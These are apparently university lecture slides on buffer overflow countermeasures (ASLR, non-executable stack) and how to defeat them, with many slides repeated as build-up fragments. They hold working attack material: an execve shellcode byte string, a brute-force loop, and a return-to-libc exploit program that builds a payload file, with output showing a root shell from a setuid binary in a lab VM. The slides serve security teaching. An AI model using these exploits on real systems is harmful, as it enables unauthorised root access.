Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Illustration

In the following code, we print the addresses of two 12-bytes

buffers
One allocated on the stack, the other one on the heap
File aslr.c
1 # include < s t d i o . h>
2 # include < s t d l i b . h>
3
4 i n t main ( )
5 {
6 char on_stack [ 1 2 ] ;
7 char * on_heap = m a l l o c (12 * s i z e o f ( char ) ) ;
8
9 p r i n t f ( " Address o f stack − a l l o c a t e d b u f f e r : %p \ n " , on_stack ) ;
10 p r i n t f ( " Address o f heap− a l l o c a t e d b u f f e r : %p \ n " , on_heap ) ;
11 }

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 67 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Effects of ASLR

1 ssd@ssd−vb : ~ $ sudo s y s c t l −w k e r n e l . randomize_va_space=0

2 k e r n e l . randomize_va_space=0
3 ssd@ssd−vb : ~ $ . / a s l r
4 Address o f stack − a l l o c a t e d b u f f e r : 0 x b f f f f 3 8 0
5 Address o f heap− a l l o c a t e d b u f f e r : 0x804b008
6 ssd@ssd−vb : ~ $ . / a s l r
7 Address o f stack − a l l o c a t e d b u f f e r : 0 x b f f f f 3 8 0
8 Address o f heap− a l l o c a t e d b u f f e r : 0x804b008
9
10 ssd@ssd−vb : ~ $ sudo s y s c t l −w k e r n e l . randomize_va_space=1
11 k e r n e l . randomize_va_space=1
12 ssd@ssd−vb : ~ $ . / a s l r
13 Address o f stack − a l l o c a t e d b u f f e r : 0xbfc89a20
14 Address o f heap− a l l o c a t e d b u f f e r : 0x804b008
15 ssd@ssd−vb : ~ $ . / a s l r
16 Address o f stack − a l l o c a t e d b u f f e r : 0xbfb35d70
17 Address o f heap− a l l o c a t e d b u f f e r : 0x804b008
18
19 ssd@ssd−vb : ~ $ sudo s y s c t l −w k e r n e l . randomize_va_space=2
20 k e r n e l . randomize_va_space=2
21 ssd@ssd−vb : ~ $ . / a s l r
22 Address o f stack − a l l o c a t e d b u f f e r : 0xbfd33320
23 Address o f heap− a l l o c a t e d b u f f e r : 0x9bf6008
24 ssd@ssd−vb : ~ $ . / a s l r
25 Address o f stack − a l l o c a t e d b u f f e r : 0xbf88be20
26 Address o f heap− a l l o c a t e d b u f f e r : 0x9cb4008

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 68 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Effectiveness of ASLR
If we locate all areas of a process randomly, we can run into
compatibility issues
The addresses available for randomisation have reduced range

Entropy
n bits of entropy means there are 2n possible locations
Uniformly distributed

On 32-bits Linux, static6 ASLR has

19 bits of entropy for the stack
13 bits of entropy for the heap
Possible countermeasure : prevent executions for some time after
successive crashes
6
Only program image is not random
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 69 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Effectiveness of ASLR
If we locate all areas of a process randomly, we can run into
compatibility issues
The addresses available for randomisation have reduced range

Entropy
n bits of entropy means there are 2n possible locations
Uniformly distributed

On 32-bits Linux, static6 ASLR has

Effectiveness of ASLR
If we locate all areas of a process randomly, we can run into
compatibility issues
The addresses available for randomisation have reduced range

Entropy
n bits of entropy means there are 2n possible locations
Uniformly distributed

On 32-bits Linux, static6 ASLR has

Effectiveness of ASLR
If we locate all areas of a process randomly, we can run into
compatibility issues
The addresses available for randomisation have reduced range

Entropy
n bits of entropy means there are 2n possible locations
Uniformly distributed

On 32-bits Linux, static6 ASLR has

Effectiveness of ASLR
If we locate all areas of a process randomly, we can run into
compatibility issues
The addresses available for randomisation have reduced range

Entropy
n bits of entropy means there are 2n possible locations
Uniformly distributed

On 32-bits Linux, static6 ASLR has

Effectiveness of ASLR
If we locate all areas of a process randomly, we can run into
compatibility issues
The addresses available for randomisation have reduced range

Entropy
n bits of entropy means there are 2n possible locations
Uniformly distributed

On 32-bits Linux, static6 ASLR has

Effectiveness of ASLR
If we locate all areas of a process randomly, we can run into
compatibility issues
The addresses available for randomisation have reduced range

Entropy
n bits of entropy means there are 2n possible locations
Uniformly distributed

On 32-bits Linux, static6 ASLR has

Effectiveness of ASLR
If we locate all areas of a process randomly, we can run into
compatibility issues
The addresses available for randomisation have reduced range

Entropy
n bits of entropy means there are 2n possible locations
Uniformly distributed

On 32-bits Linux, static6 ASLR has

Effectiveness of ASLR
If we locate all areas of a process randomly, we can run into
compatibility issues
The addresses available for randomisation have reduced range

Entropy
n bits of entropy means there are 2n possible locations
Uniformly distributed

On 32-bits Linux, static6 ASLR has

When in doubt, use brute force

On 32-bits Linux machines7 , stack only has 19 bits of entropy

219 “ 524 288 : not that high
♡ Brute force ♡
1 while [ 1 ]
2 do
3 . / overflow
4 done

It took only 21 minutes for the script to get a root shell

While inefficient on modern computers and smartphones, it works
nicely on several other devices

7
Our VM is 32-bits
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 70 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Defeating non executable stack

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 71 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Executing the stack

Illustration

1 We load a shellcode onto the stack

2 We cast it as a function and call it
File dont-do-this-at-home.c
1 # include < s t r i n g . h>
2
3 const char s h e l l c o d e [ ] =
4 " \ x31 \ xc0 \ x50 \ x68 / / sh \ x68 / b i n "
5 " \ x89 \ xe3 \ x50 \ x53 \ x89 \ xe1 \ x99 "
6 " \ xb0 \ x0b \ xcd \ x80 " ;
7
8 i n t main ( )
9 {
10 char b u f f e r [ s i z e o f ( s h e l l c o d e ) ] ;
11 strcpy ( buffer , shellcode ) ;
12
13 void ( * f ) ( ) = ( void ( * ) ( ) ) b u f f e r ; / / l i v i n g t h e dream
14 f ();
15 }

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 73 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Result

It looks effective
1 ssd@ssd−vb : ~ $ gcc −z execstack −o dont −do− t h i s −at −home dont −do− t h i s −at −home . c
2 ssd@ssd−vb : ~ $ . / s h e l l − s t a c k
3 $
4 $ exit
5 ssd@ssd−vb : ~ $ ssd@ssd−vb : ~ $ gcc −o dont −do− t h i s −at −home dont −do− t h i s −at −home . c
6 ssd@ssd−vb : ~ $ . / s h e l l − s t a c k
7 Segmentation f a u l t ( core dumped )

Rethorical question
Does the code we jump on need to be loaded on the stack?

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 74 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Relative effectiveness

If the stack is set as non executable, we need to find another

If the stack is set as non executable, we need to find another

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 75 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Relative effectiveness

If the stack is set as non executable, we need to find another

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 75 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

Call system("bin/sh")
The plan is to
1 Find the address of system
We will overwrite the return address of the vulnerable function with it
Like this, we will jump to system
2 Find the address of the "/bin/sh" string
Like this, we can use it as argument of system
3 We need to pass "/bin/sh" as argument to system
We will load this address on the stack
Find out where to put it
The first two steps are rather easy

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

What are we doing tonight, Brainiac?

The goal is to jump to the system function

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 76 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 1: find the address of system

In Linux, when a program runs, the libc library will be loaded in

memory
Always at the same location
We can find the address of system with dbg
We debug overflow.c
We don’t need debugging info here
It is set-uid : the privileges will be dropped when debugging
But we don’t care
Later on, we will need the address of the exit function
We print the address of these two functions with the p command

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 77 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 1: find the address of system

In Linux, when a program runs, the libc library will be loaded in

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 77 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 1: find the address of system

In Linux, when a program runs, the libc library will be loaded in

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 77 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 1: find the address of system

In Linux, when a program runs, the libc library will be loaded in

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 77 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 1: find the address of system

In Linux, when a program runs, the libc library will be loaded in

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 77 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 1: find the address of system

In Linux, when a program runs, the libc library will be loaded in

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 77 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 1: find the address of system

In Linux, when a program runs, the libc library will be loaded in

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 77 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 1: find the address of system

In Linux, when a program runs, the libc library will be loaded in

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 77 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 1: find the address of system

In Linux, when a program runs, the libc library will be loaded in

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 77 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Illustration

1 ssd@ssd−vb : ~ $ touch b a d f i l e
2 ssd@ssd−vb : ~ $ gdb o v e r f l o w
3 ...
4 ( gdb ) run
5 S t a r t i n g program / home / ssd / Documents / ssd − b u f f e r − o v e r f l o w / o v e r f l o w
6 Alright
7 ...
8 ( gdb ) p system
9 $1 { < t e x t v a r i a b l e , no debug i n f o >} 0xb75b1460 <system >
10 ( gdb ) p e x i t
11 $2 { < t e x t v a r i a b l e , no debug i n f o >} 0xb75a4fe0 <system >
12 ( gdb ) q u i t

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 78 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 2: find the address of "/bin/sh"

To run /bin/sh, the string "/bin/sh" must be in memory

Its address must be passed to system
We can
place the string in the buffer when we overflow
We then figure out its address
load it with environment variables
We export a custom environment variable
All environment variables are passed to children in shell processes
We can get a program to print the address of that variable

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 79 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 2: find the address of "/bin/sh"

To run /bin/sh, the string "/bin/sh" must be in memory

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 79 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 2: find the address of "/bin/sh"

To run /bin/sh, the string "/bin/sh" must be in memory

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 79 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 2: find the address of "/bin/sh"

To run /bin/sh, the string "/bin/sh" must be in memory

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 79 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 2: find the address of "/bin/sh"

To run /bin/sh, the string "/bin/sh" must be in memory

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 79 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 2: find the address of "/bin/sh"

To run /bin/sh, the string "/bin/sh" must be in memory

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 79 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 2: find the address of "/bin/sh"

To run /bin/sh, the string "/bin/sh" must be in memory

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 79 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 2: find the address of "/bin/sh"

To run /bin/sh, the string "/bin/sh" must be in memory

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 79 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 2: find the address of "/bin/sh"

To run /bin/sh, the string "/bin/sh" must be in memory

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 79 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Illustration

File envaddr.c
1 # include < s t d i o . h>
2 # include < u n i s t d . h>
3
4 i n t main ( )
5 {
6 char * s h e l l = ( char * ) getenv ( "MYSHELL" ) ;
7
8 if ( shell )
9 {
10 p r i n t f ( " Value : %s \ n " , s h e l l ) ;
11 p r i n t f ( " Address : %p \ n " , s h e l l ) ;
12 }
13 }

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 80 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Result

1 ssd@ssd−vb : ~ $ gcc −o envaddr_ envaddr . c

2 ssd@ssd−vb : ~ $ export MYSHELL= " / b i n / sh "
3 ssd@ssd−vb : ~ $ . / envaddr_
4 Value : / b i n . sh
5 Address : 0 x b f f f f e 8 3

Changing the file name changes the address

1 ssd@ssd−vb : ~ $ mv envaddr endaddrlonger
2 ssd@ssd−vb : ~ $ . / e n va dd rl o ng er
3 Value : / b i n / sh
4 Address : 0 x b f f f f e 7 b

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 81 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Why it happens
Environment variables are stored on the stack
Before they are pushed, the name of the program is pushed
Consequently, the length of the name affects the location of the
environment variables
1 ssd@ssd−vb : ~ $ gcc −g −o envaddr_dbg envaddr . c
2 ssd@ssd−vb : ~ $ gdb envaddr_gdb
3 ...
4 ( gdb ) b main
5 b r e a k p o i n t 1 a t 0x804841d : f i l e envaddr . c , l i n e 6
6 ( gdb ) run
7 S t a r t i n g program . . .
8 B r e a k p o i n t 1 , main ( ) a t envaddr . c : 6
9 ( gdb ) x /100 s * ( ( char * * ) e n v i r o n )
10 0 x b f f f f 5 5 2 : "SSH_AGENT_PID=1561 "
11 0 x b f f f f 5 6 4 : "GPG_AGENT_INFO= / tmp / k e y r i n g −xNwnYB / gpg : 0 : 1 "
12 0 x b f f f f 5 9 c : "SHELL= / b i n / sh "
13 ...
14 0 x b f f f f f c 8 : " / home / ssd / envaddr_dbg "

If we change the length of the program name, we observe that all

the addresses of environment variables are shifted
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 82 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

When we call a function, we
prepare arguments
x86 : push everything on the stack
x64 : only push arguments above 6
prepare the stack frame
Arguments pushed on the stack can be recovered from rbp
x86 : first argument at ebp + 8
x64 : seventh argument at rbp + 16
Here, we are not going to "properly" call system
We need will need to manually push the address of "/bin/sh"
Or mov it to rdi in x64

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Step 3 : pass "/bin/sh" as argument to system

We cannot proceed directly as we did in the previous shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 83 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

The tricky part

We also need to handle the stack frame manually :
1 prepare the stack for our function (local variables, etc.)
2 restore the stack to the state it was before call
When a function is called
1 rbp is always pushed
push rbp
2 rbp is affected to rsp
mov rsp, rbp
3 a space of n bytes is allocated for local variables
sub rsp, n
When a function ends,
1 registers are restored back to their values before call
mov rbp, esp
pop rbp
2 we hit return
ret
The instructions enter N, 0 and leave do this as well
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 84 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

The tricky part

Example

File function.c
1 void f o o ( i n t x )
2 {
3 int a;
4 a = x;
5 }
6
7 void s t u f f ( )
8 {
9 int b = 5;
10 foo ( b ) ;
11 }

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 85 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Assembly code

1 ...
2
3 foo :
4 p u s h l %ebp
5 movl %esp , %ebp
6 s u b l $16 , %esp
7
8 movl 8(%rbp ) , %eax
9 movl %eax , −4(%ebp )
10
11 leave
12 ret
13
14 stuff :
15 p u s h l %ebp
16 movl %esp , ebp
17 s u b l $20 , %esp
18
19 movl $42 , −4(%ebp )
20 movl −4(%ebp ) , %eax
21 movl %eax , (%esp )
22
23 c a l l foo
24
25 leave
26 ret

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 86 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

It is time
We know where to put "/bin/sh" on the stack
We will overflow the return address of copy_stuff with the
address of system
Between the point when the return address is modified and the
point where the argument of system is used, the program will
execute the prologues of both copy_stuff and system
By tracing these instructions, we will know where rbp points
We will proceed as before: with gdb
Note that it is important to trace rsp, and not rbp
We don’t care where it points at that moment
Because rbp will be replaced by rsp
When system is executed, the function prologue is executed
Moves rsp 8 bytes below, and sets rbp to the current value of rsp
It is wiser to overflow the return address of system with the
address of exit
Arbitrary values will likely cause a crash
R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 87 / 92
Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Illustration

Argmt. of system
str Return of system
esp
Return address Addr. of system Addr. of system
ebp
main’s ebp
ebp

esp ∆

buffer
After hitting ret
Inside copy_stuff Inside system
inside copy_stuff

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 88 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Building badfile

We could write another shell code

We could write another shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 89 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Building badfile

We could write another shell code

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 89 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Sniffing our way around

1 ssd@ssd−vb : ~ $ gcc −fno − stack − p r o t e c t o r −g −o o v e r f l o g o v e r f l o w . c

2 ssd@ssd−vb : ~ $ touch b a d f i l e
3 ssd@ssd−vb : ~ $ gdb o v e r f l o g
4 ( gdb ) b c o p y _ s u f f
5 B r e a k p o i n t 1 a t 0x80484bd : f i l e o v e r f l o w . c , l i n e 10
6 ( gdb ) run
7 S t a r t i n g program . . .
8 b r e a k p o i n t 1 , c o p y _ s t u f f ( s t r =xxx 0 x b f f f f 1 6 c ) a t o v e r f l o w . c
9 ( gdb ) p & b u f f e r
10 $1 = ( char ( * ) [ 1 0 0 ] ) 0 x b f f f f 0 d c
11 ( gdb ) p $ebp
12 $2 = ( v o i d * ) 0 x b f f f f 1 4 8
13 ( gdb ) p 0 x b f f f f 1 4 8 − 0 x b f f f f 0 d c
14 $3 = 108
15 ( gdb ) q u i t

The offset of the address of system is 108 ` 4 “ 112

The offset of the return address of system is 108 ` 8 “ 116
The offset of "/bin/sh" of is 108 ` 12 “ 120

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 90 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Our malicious code

File malicious-libc.c
1 # include < s t d i o . h>
2 # include < s t d l i b . h>
3 # include < s t r i n g . h>
4
5 i n t main ( )
6 {
7 char b u f f e r [ 2 0 0 ] ;
8
9 memset ( b u f f e r , 0xaa , 2 0 0 ) ; / / f i l l w i t h non zeros
10
11 * ( long * ) & b u f f e r [ 1 2 0 ] = 0 x b f f f f e 8 3 ; / / address o f " / b i n / sh "
12 * ( long * ) & b u f f e r [ 1 1 6 ] = 0xb75a4fe0 ; / / address o f e x i t
13 * ( long * ) & b u f f e r [ 1 1 2 ] = 0xb75b1460 ; / / address o f system
14
15 FILE * b a d f i l e = fopen ( " . / b a d f i l e " , "w" ) ;
16 f w r i t e ( buffer , sizeof ( b u f f e r ) , 1 , b a d f i l e ) ;
17 fclose ( badfile )
18 }

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 91 / 92

Introduction Recalls The attack Deployment Writing a shell code Countermeasures ASLR Non executable stack

Launching the attack

1 ssd@ssd−vb : ~ $ gcc −o m a l i c i o u s − l i b c m a l i c i o u s − l i b c . c
2 ssd@ssd−vb : ~ $ gcc −fno − stack − p r o t e c t o r −o o v e r f l o w o v e r f l o w . c
3 ssd@ssd−vb : ~ $ sudo chown r o o t o v e r f l o w
4 ssd@ssd−vb : ~ $ sudo chmod 4755 o v e r f l o w
5 ssd@ssd−vb : ~ $ . / m a l i c i o u s − l i b c
6 ssd@ssd−vb : ~ $ . / o v e r f l o w
7 #
8 # id
9 u i d =0( r o o t ) g i d =1000( ssd ) groups =0( r o o t ) , . . .

R. Absil ESI Ch. 5 - Buffer Overflow October 27, 2022 92 / 92

EVE NG Images PDF
No ratings yet
EVE NG Images PDF
2 pages
3_BufOverflows
No ratings yet
3_BufOverflows
100 pages
CEH v5 Module 20 Buffer Overflow
No ratings yet
CEH v5 Module 20 Buffer Overflow
36 pages
BOF en
No ratings yet
BOF en
86 pages
Bài 3 - Software Security
No ratings yet
Bài 3 - Software Security
40 pages
L4P3 Stack Overflow
No ratings yet
L4P3 Stack Overflow
31 pages
Smashing The Stack Smashing The Stack
100% (1)
Smashing The Stack Smashing The Stack
43 pages
Hacking Module 16
100% (1)
Hacking Module 16
28 pages
LAB - Chapter 3.2 - Software Security - Buffer - Overflow
No ratings yet
LAB - Chapter 3.2 - Software Security - Buffer - Overflow
8 pages
2b - Bufferoverflows
No ratings yet
2b - Bufferoverflows
24 pages
3 Software Security-Updated
No ratings yet
3 Software Security-Updated
79 pages
Buffer Overflow Paper - Vulnerabilities and Attacks
No ratings yet
Buffer Overflow Paper - Vulnerabilities and Attacks
17 pages
Comp Security
No ratings yet
Comp Security
9 pages
Buffer Overflow Attack Lab - Updated
No ratings yet
Buffer Overflow Attack Lab - Updated
7 pages
Buffer Overflow Attacks On Linux Principles Analyzing and Protection
No ratings yet
Buffer Overflow Attacks On Linux Principles Analyzing and Protection
5 pages
Buffer overflow - Copy
No ratings yet
Buffer overflow - Copy
11 pages
Lab2 Instruction
No ratings yet
Lab2 Instruction
12 pages
Chapter 3 - Software Security
No ratings yet
Chapter 3 - Software Security
31 pages
Smashing The Stack: Launching or Preventing A Slammer-Like Worm
No ratings yet
Smashing The Stack: Launching or Preventing A Slammer-Like Worm
43 pages
Buffer Overflow
No ratings yet
Buffer Overflow
9 pages
Blackhat Europe 2009 Fritsch Bypassing Aslr Slides
No ratings yet
Blackhat Europe 2009 Fritsch Bypassing Aslr Slides
49 pages
02 Vulns MemCorruption
No ratings yet
02 Vulns MemCorruption
55 pages
3 Software Security
No ratings yet
3 Software Security
78 pages
Ch03.4.3-Buffer Overflow Attack
No ratings yet
Ch03.4.3-Buffer Overflow Attack
23 pages
Program Errors
No ratings yet
Program Errors
18 pages
Program Errors
No ratings yet
Program Errors
18 pages
Smashing the Stack in 2010 Report for Th
No ratings yet
Smashing the Stack in 2010 Report for Th
94 pages
The Cost of Preventing a Buffer Overflow
No ratings yet
The Cost of Preventing a Buffer Overflow
4 pages
How Do Hackers Work
No ratings yet
How Do Hackers Work
32 pages
Buffer Overflow Vulnerability
No ratings yet
Buffer Overflow Vulnerability
10 pages
Locating the Address of Local Variables
No ratings yet
Locating the Address of Local Variables
4 pages
Buffer Overflow Part 1
No ratings yet
Buffer Overflow Part 1
30 pages
1 An Exploit Example, A Buffer Overflow
100% (1)
1 An Exploit Example, A Buffer Overflow
10 pages
Book Sample Buffer
No ratings yet
Book Sample Buffer
70 pages
Buffer Overflow
No ratings yet
Buffer Overflow
8 pages
David Wagner CS 161 Computer Security Notes
No ratings yet
David Wagner CS 161 Computer Security Notes
14 pages
4. Buffer Overflow
No ratings yet
4. Buffer Overflow
39 pages
CH10-CompSec5e_accessible
No ratings yet
CH10-CompSec5e_accessible
144 pages
Part4 SW SEC Memory Corruption
No ratings yet
Part4 SW SEC Memory Corruption
87 pages
Buffer Overflow Vulnerability Lab
No ratings yet
Buffer Overflow Vulnerability Lab
12 pages
Buffer_Overflow_Attack_Lab_Student_Copy
No ratings yet
Buffer_Overflow_Attack_Lab_Student_Copy
20 pages
Buffer Over Flow (BOF) : Bounds Are Not Checked While Populating It, The Array May Overflow Into
No ratings yet
Buffer Over Flow (BOF) : Bounds Are Not Checked While Populating It, The Array May Overflow Into
28 pages
Remote BOF Explanation
